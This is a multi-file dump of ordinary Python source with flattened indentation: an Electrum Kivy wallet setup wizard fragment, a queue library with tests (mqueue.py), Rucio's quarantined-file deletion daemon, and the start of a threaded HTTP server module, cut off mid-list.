tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return unicode(ti.text).strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste())
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
        `on_wizard_complete`: Fired when the wizard has finished creating or
        restoring wallets.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _("Please paste your cosigner's master public key, or scan it using the camera button.")
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
mqueue.py
|
"""MQueue is a queueing primitive that provides composing new queues
from selecting ("choose") and mapping ("map") other queues.
For base use you create instances of MQueue that you can put and take
elements to and from. If you need to read from multiple MQueues, you
can use "select" to do that directly, but "choose" if you want to
construct a new MQueueBase that is takeable when any of its source
queues has data available.
MQueues are unbounded in their size and sending to and taking from a
queue is non-blocking. The blocking way to read from a queue is to use
the top-level "take" method.
Copyright 2020 Erkki Seppälä <flux@inside.org>
License: MIT
"""
from typing import Callable, Deque, Dict, Generic, List, NewType, Optional, Tuple, TypeVar, Union, Sequence, overload
from collections import deque
from threading import Lock, Condition, Thread
from abc import ABC, abstractclassmethod
import time
import unittest
from roamtoothd.idgen import IdGen
T = TypeVar('T') # pylint: disable=invalid-name
U = TypeVar('U') # pylint: disable=invalid-name
V = TypeVar('V') # pylint: disable=invalid-name
QueueId = NewType('QueueId', int)
Callback = Callable[[Optional[Exception]], None]
CallbackId = NewType('CallbackId', int)
class NoInputs(Exception):
"""You provided an empty list of MQueues to select"""
callback_id_gen: IdGen[CallbackId] = IdGen(CallbackId)
class ValueWrapper(Generic[T]):
"""Wrap values inside a class; used to overcome mypy type checking woes.
We cannot use type variables for isinstance checks, but we can use ValueWrapper."""
def __init__(self, value: T):
self.value = value
class MQueueBase(ABC, Generic[T]):
"""Base class for MQueue."""
@abstractclassmethod
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Either take (remove from queue) a value from the queue, or if the queue is empty, install the
callback. In that case the CallbackId for removal is returned.
This operation is done with the lock held, but the lock is not held when calling the
callback."""
def take_or_add_callback(self, callback: Callback) -> \
Union[CallbackId, ValueWrapper[T]]:
"""A version of take_mapped_or_add_callback that doesn't use a mappign function."""
return self.take_mapped_or_add_callback(callback, lambda x: x)
@abstractclassmethod
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove a callback by its id. If the callback is not installed, this is a no-op."""
@abstractclassmethod
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Non-blocking take that performs mapping holding the internal lock.
This allows for consistent behavior should the mapping function throw;
in that case the value is not removed from the Queue and remains to be
collected by a source that doesn't fail reading it."""
def take_nonblock(self) -> Optional[T]:
"""Non-blocking take"""
return self.take_mapped(lambda x: x)
def map(self, mapping: Callable[[T], U]) -> "MQueueMapped[T, U]":
"""Returna new MQueueMapped that behaves as this one, but has its values mapped with the given
mapping function."""
return MQueueMapped(self, mapping)
class MQueue(MQueueBase[T]):
"""MQueue is a multi-selectable Queue
In other words, you can wait for any one of multiple MQueue
objects to be readable."""
_queue_id_gen: IdGen[QueueId] = IdGen(QueueId)
def __init__(self) -> None:
# used for ordering locking to eliminate deadlocks
self.queue_id = MQueue._queue_id_gen.make()
self._messages: Deque[T] = deque()
self._lock = Lock()
#self._new_data = Condition(self._lock)
self._callbacks: Dict[CallbackId, Callback] = {}
def put(self, value: T) -> None:
"""Puts in a new value to this queue. Non-blocking."""
callbacks: List[Callback] = []
with self._lock:
self._messages.append(value)
callbacks = [cb[1] for cb in self._callbacks.items()]
self._callbacks = {}
#self._new_data.notify_all()
for callback in callbacks:
callback(None)
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Take a value mapped with the given mapping function.
If there is no value in the queue, return None.
Mapping is performed with the MQueue lock held."""
with self._lock:
if self._messages:
value = self._messages.popleft()
try:
ret_value = mapping(value)
except:
self._messages.appendleft(value)
raise
return ret_value
else:
return None
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Returns the value is one is available, in which case no callback is installed.
Otherwise installs the callback and returns its id.
"""
# watch out for tricky flow..
with self._lock:
if self._messages:
value = self._messages.popleft()
try:
return ValueWrapper(mapping(value))
except:
self._messages.appendleft(value)
raise
else:
callback_id = callback_id_gen.make()
self._callbacks[callback_id] = callback
return callback_id
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove a callback by its id."""
with self._lock:
if callback_id in self._callbacks:
del self._callbacks[callback_id]
class MQueueMapped(MQueueBase[U], Generic[T, U]):
"""Given an MQueueBase[T] and a mapping function from T to U, perform mapping if its values to U."""
def __init__(self, parent: MQueueBase[T], mapping: Callable[[T], U]) -> None:
self.parent = parent
self.mapping = mapping
def take_mapped(self, mapping: Callable[[U], V]) -> Optional[V]:
"""Take a mapped value.
        The mapping is applied on top of the mapping performed by the object itself.
"""
return self.parent.take_mapped(lambda x: mapping(self.mapping(x)))
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[U], V]) -> \
Union[CallbackId, ValueWrapper[V]]:
"""Returns a value or installs a callback."""
return self.parent.take_mapped_or_add_callback(callback, lambda x: mapping(self.mapping(x)))
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove given callback."""
return self.parent.remove_callback(callback_id)
class MQueueSelect(MQueueBase[T]):
"""Given multiple MQueueBases, activate as soon as one of them becomes active."""
def __init__(self, queues: Sequence[MQueueBase[T]]) -> None:
self.queues = queues
self._callbacks: Dict[CallbackId, Dict[int, Tuple[MQueueBase[T], CallbackId]]] = {}
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Takes a mapped value from the queues (or None if none available)"""
for queue in self.queues:
value = queue.take_mapped(mapping)
if value is not None:
return value
return None
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Take a mapped value from the queues or installs callbacks."""
callback_id = callback_id_gen.make()
def wrapped_callback(incoming_exception: Optional[Exception]) -> None:
self.remove_callback(callback_id)
try:
callback(incoming_exception)
except Exception as exn: # pylint: disable=broad-except
callback(exn)
callback_ids: Dict[int, Tuple[MQueueBase[T], CallbackId]] = {}
def cancel_callbacks() -> None:
for _, callback_info in callback_ids.items():
callback_info[0].remove_callback(callback_info[1])
queue_index = 0
for queue in self.queues:
try:
value = queue.take_mapped_or_add_callback(wrapped_callback, mapping)
if isinstance(value, ValueWrapper):
cancel_callbacks()
return value
else:
callback_ids[queue_index] = (queue, value)
queue_index += 1
except:
cancel_callbacks()
raise
callback_id = callback_id_gen.make()
self._callbacks[callback_id] = callback_ids
return callback_id
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove callback by its id."""
if callback_id in self._callbacks:
callbacks = self._callbacks[callback_id]
del self._callbacks[callback_id]
for _, callback_info in callbacks.items():
callback_info[0].remove_callback(callback_info[1])
@overload
def take(queue: MQueueBase[T]) -> T: # pylint: disable=missing-function-docstring
...
@overload
def take(queue: MQueueBase[T], timeout: Optional[float]) -> Optional[T]: # pylint: disable=missing-function-docstring
...
def take(queue: MQueueBase[T], timeout: Optional[float] = None) -> Optional[T]:
"""Given a queue, take a value from, possibly limited by the given timeout.
If timeout expires the function returns None."""
deadline = time.monotonic() + timeout if timeout is not None else None
def timer_expired() -> bool:
return deadline is not None and time.monotonic() >= deadline
result_available = Condition()
got_result: List[Optional[T]] = [None]
got_exception: List[Optional[Exception]] = [None]
local_result: Optional[ValueWrapper[T]] = None
local_exception: Optional[Exception] = None
while local_result is None and local_exception is None and not timer_expired():
def callback(exception: Optional[Exception]) -> None:
with result_available:
if exception is not None:
got_exception[0] = exception
else:
try:
got_result[0] = queue.take_nonblock()
except Exception as exn: # pylint: disable=broad-except
got_exception[0] = exn
result_available.notify()
take_result = queue.take_or_add_callback(callback)
if isinstance(take_result, ValueWrapper):
local_result = take_result
with result_available:
while local_result is None and local_exception is None and not timer_expired(): # type: ignore
if deadline is None:
result_available.wait()
else:
time_left = deadline - time.monotonic()
if time_left > 0:
result_available.wait(time_left)
            if got_exception[0] is not None:
local_exception = got_exception[0]
if got_result[0] is not None:
local_result = ValueWrapper(got_result[0])
if isinstance(take_result, int):
queue.remove_callback(take_result)
if local_exception is not None:
raise local_exception # pylint: disable=raising-bad-type
else:
return local_result.value if local_result else None
def choose(queues: Sequence[MQueueBase[T]]) -> MQueueSelect[T]:
"""Note: if queues is empty, this will never activate."""
return MQueueSelect(queues)
@overload
def select(queues: Sequence[MQueueBase[T]]) -> T: # pylint: disable=missing-function-docstring
...
@overload
def select(queues: Sequence[MQueueBase[T]], timeout: Optional[float]) -> Optional[T]: # pylint: disable=missing-function-docstring
...
def select(queues: Sequence[MQueueBase[T]], timeout: Optional[float] = None) -> Optional[T]:
"""Given a sequence of MQueues, return the first value it finds from them, within the optional
timeout.
If the timeout expires, returns None.
Basically chains take and choose together.
If the queues list is empty, raises NoInputs.
"""
if not queues:
raise NoInputs
return take(choose(queues), timeout)
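# Illustrative usage sketch (added for exposition; not part of the original
# module). It exercises put/map/choose/take as described in the module
# docstring; the queue names and values below are invented for demonstration.
def _usage_sketch() -> None:
    """Compose queues with map/choose and read from them with take."""
    numbers: MQueue[int] = MQueue()
    words: MQueue[str] = MQueue()
    numbers.put(41)
    # map() derives a new queue; choose() merges several queues into one
    # source that becomes takeable when any of its inputs has data.
    merged = choose([numbers.map(lambda n: str(n + 1)), words])
    # take() blocks until a value is available or the timeout expires.
    assert take(merged, 1.0) == "42"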
class TestExn(Exception):
"""Test exception used in tests"""
class TestMQueue(unittest.TestCase):
"""MQueue tests"""
def test_empty(self) -> None:
"""Test taking from an empty queue."""
queue: MQueue[int] = MQueue()
self.assertEqual(queue.take_nonblock(), None)
def test_simple(self) -> None:
"""Test taking a value from a queue with one value."""
queue: MQueue[int] = MQueue()
queue.put(42)
self.assertEqual(queue.take_nonblock(), 42)
def test_callback(self) -> None:
"""Test invoking a callback then taking a value frmo a queue."""
queue: MQueue[int] = MQueue()
callback_called = [0]
def callback(_: Optional[Exception]) -> None:
callback_called[0] += 1
callback_id = queue.take_or_add_callback(callback)
self.assertIsNotNone(callback_id)
queue.put(42)
self.assertEqual(queue.take_nonblock(), 42)
self.assertEqual(callback_called[0], 1)
def test_select_0(self) -> None:
"""Tests that selecting from no queues results in an exception."""
with self.assertRaises(NoInputs):
select([], timeout=None)
def test_select_timeout_1(self) -> None:
"""Tests that timeout works when queue receives no data."""
queue: MQueue[int] = MQueue()
value = select([queue], timeout=0.1)
self.assertEqual(value, None)
self.assertEqual(queue._callbacks, {}) # pylint: disable=protected-access
def test_select_timeout_2(self) -> None:
"""Tests that timeout works when the two queues receive no data."""
queue1: MQueue[int] = MQueue()
queue2: MQueue[int] = MQueue()
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, None)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_select_1(self) -> None:
"""Test that select works with a queue with one value."""
queue: MQueue[int] = MQueue()
queue.put(42)
value = select([queue], timeout=None)
self.assertEqual(value, 42)
self.assertEqual(queue._callbacks, {}) # pylint: disable=protected-access
def test_select_2(self) -> None:
"""Test that select works with two queues, each with one value."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
queue2: MQueue[int] = MQueue()
queue2.put(2)
value1 = select([queue1, queue2], timeout=None)
self.assertTrue(value1 in [1, 2])
value2 = select([queue1, queue2], timeout=None)
self.assertTrue(value2 in [1, 2] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_select_live(self) -> None:
"""Test that select works with one value, when the value is put in in an another thread."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
thread_handle = Thread(target=thread)
thread_handle.start()
value = select([queue1], timeout=0.2)
self.assertEqual(value, 1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live2(self) -> None:
"""Tests that select works with two values, values put into separate queues in another thread. """
queue1: MQueue[int] = MQueue()
queue2: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
time.sleep(0.05)
queue2.put(2)
thread_handle = Thread(target=thread)
thread_handle.start()
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, 1)
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_map(self) -> None:
"""Test that map works with take_nonblock."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
qm1 = queue1.map(lambda x: x + 1)
value = qm1.take_nonblock()
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_map_select_1(self) -> None:
"""Test that map works with select."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
value = select([queue1.map(lambda x: x + 1)])
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_map_select_2(self) -> None:
"""Test that map works with select, with two queues."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
queue2: MQueue[int] = MQueue()
queue2.put(10)
value1 = select([queue1.map(lambda x: x + 1),
queue2.map(lambda x: x + 1)])
self.assertTrue(value1 in [1, 11])
value2 = select([queue1.map(lambda x: x + 1),
queue2.map(lambda x: x + 1)])
self.assertTrue(value2 in [1, 11] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_map_select_raise_1(self) -> None:
"""Test that map works with select and a risen exception."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
with self.assertRaises(TestExn):
def failer(i: int) -> int:
raise TestExn()
select([queue1.map(failer)])
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live_raise(self) -> None:
"""Test that map works with select and a risen exception when the value is put in in an another thread."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
thread_handle = Thread(target=thread)
thread_handle.start()
with self.assertRaises(TestExn):
def failer(i: int) -> int:
raise TestExn()
select([queue1.map(failer)])
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live_raise2(self) -> None:
"""Test that reading values from a queue works even if the mapping function throw an exception once."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
queue1.put(2)
thread_handle = Thread(target=thread)
thread_handle.start()
count = [0]
def failer(i: int) -> int:
count[0] += 1
if count[0] == 1:
raise TestExn()
else:
return i
source = [queue1.map(failer)]
with self.assertRaises(TestExn):
value = select(source)
value = select(source)
self.assertEqual(value, 1)
value = select(source)
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_deep1(self) -> None:
"""Test that choose inside a choose works."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
value = take(choose([choose([queue1.map(lambda x: x + 1)])]))
self.assertEqual(value, 1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_deep2(self) -> None:
"""Test that choose inside a choose works, when different levels are used."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
queue2: MQueue[int] = MQueue()
queue2.put(10)
source = choose([choose([queue1.map(lambda x: x + 1)]),
queue2.map(lambda x: x + 1)])
value1 = take(source)
self.assertTrue(value1 in [1, 11])
value2 = take(source)
self.assertTrue(value2 in [1, 11] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
if __name__ == '__main__':
unittest.main()
|
dark_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2020
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
#
# PY3K COMPATIBLE
'''
Dark Reaper is a daemon to manage quarantined file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.quarantined_replica import (list_quarantined_replicas,
delete_quarantined_replicas,
list_rses)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Dark Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rses)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Dark Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse)
replicas = list_quarantined_replicas(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
scope = ''
if replica['scope']:
scope = replica['scope'].external
try:
                            pfn = str(list(rsemgr.lfns2pfns(rse_settings=rse_info,
                                                            lfns=[{'scope': scope, 'name': replica['name'], 'path': replica['path']}],
                                                            operation='delete', scheme=scheme).values())[0])
logging.info('Dark Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, scope, replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Dark Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, scope, replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Dark Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, scope, replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Dark Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, scope, replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except Exception:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_quarantined_replicas(rse_id=rse_id, replicas=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Dark Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except Exception:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
    :param once: If True, only runs one iteration of the main loop.
    :param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
    :param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
    :param exclude_rses: RSE expression to exclude RSEs from the Reaper.
    :param include_rses: RSE expression to include RSEs.
    :param all_rses: If True, run against all RSEs that have quarantined replicas.
"""
logging.info('main: starting processes')
if all_rses:
rses = list_rses()
elif not rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
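# Illustrative invocation sketch (added for exposition; the daemon is normally
# launched through Rucio's own CLI wrapper, not this block). It only shows the
# shape of the arguments accepted by run() and how stop() can be wired to a
# termination signal; the argument values are invented for demonstration only.
if __name__ == '__main__':
    import signal
    signal.signal(signal.SIGTERM, stop)  # request a graceful stop on SIGTERM
    run(total_workers=1, chunk_size=100, once=True, all_rses=True)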
|
server.py
|
"""
A high-speed, production ready, thread pooled, generic HTTP server.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = HTTPServer(...)
server.start()
-> while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
For running a server you can invoke :func:`start() <HTTPServer.start()>` (it
will run the server forever) or invoke :func:`prepare()
<HTTPServer.prepare()>` and :func:`serve() <HTTPServer.serve()>` like this::
server = HTTPServer(...)
server.prepare()
try:
threading.Thread(target=server.serve).start()
# waiting/detecting some appropriate stop condition here
...
finally:
server.stop()
And now for a trivial doctest to exercise the test suite
>>> 'HTTPServer' in globals()
True
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import io
import re
import email.utils
import socket
import sys
import time
import traceback as traceback_
import logging
import platform
import contextlib
import threading
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import six
from six.moves import queue
from six.moves import urllib
from . import connections, errors, __version__
from ._compat import bton, ntou
from ._compat import IS_PPC
from .workers import threadpool
from .makefile import MakeFile, StreamWriter
__all__ = (
'HTTPRequest', 'HTTPConnection', 'HTTPServer',
'HeaderReader', 'DropUnderscoreHeaderReader',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'Gateway', 'get_ssl_adapter_class',
)
IS_WINDOWS = platform.system() == 'Windows'
"""Flag indicating whether the app is running under Windows."""
IS_GAE = os.getenv('SERVER_SOFTWARE', '').startswith('Google App Engine/')
"""Flag indicating whether the app is running in GAE env.
Ref:
https://cloud.google.com/appengine/docs/standard/python/tools
/using-local-server#detecting_application_runtime_environment
"""
IS_UID_GID_RESOLVABLE = not IS_WINDOWS and not IS_GAE
"""Indicates whether UID/GID resolution's available under current platform."""
if IS_UID_GID_RESOLVABLE:
try:
import grp
import pwd
except ImportError:
"""Unavailable in the current env.
This shouldn't be happening normally.
All of the known cases are excluded via the if clause.
"""
IS_UID_GID_RESOLVABLE = False
grp, pwd = None, None
import struct
if IS_WINDOWS and hasattr(socket, 'AF_INET6'):
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
if not hasattr(socket, 'SO_PEERCRED'):
"""
NOTE: the value for SO_PEERCRED can be architecture specific, in
which case the getsockopt() will hopefully fail. The arch
specific value could be derived from platform.processor()
"""
socket.SO_PEERCRED = 21 if IS_PPC else 17
LF = b'\n'
CRLF = b'\r\n'
TAB = b'\t'
SPACE = b' '
COLON = b':'
SEMICOLON = b';'
EMPTY = b''
ASTERISK = b'*'
FORWARD_SLASH = b'/'
QUOTED_SLASH = b'%2F'
QUOTED_SLASH_REGEX = re.compile(b''.join((b'(?i)', QUOTED_SLASH)))
comma_separated_headers = [
